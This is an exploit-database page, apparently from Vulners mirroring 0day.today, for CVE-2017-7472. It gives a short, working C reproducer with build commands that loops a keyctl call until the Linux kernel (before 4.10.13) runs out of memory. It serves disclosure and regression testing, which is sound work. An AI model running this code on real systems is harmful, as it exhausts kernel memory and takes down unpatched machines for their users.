Lucene search
K

Linux Kernel < 4.10.13 - keyctl_set_reqkey_keyring Local Denial of Service Exploit

🗓️ 08 Jun 2017 00:00:00Reported by Marcus MeissnerType 
zdt
 zdt
🔗 0day.today👁 61 Views

Linux Kernel < 4.10.13 - keyctl_set_reqkey_keyring DoS Exploi

Related
Code
/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:
 
gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472
 
(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>
 
int main()
{
    for (;;)
        keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}

#  0day.today [2018-02-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jun 2017 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.00502
61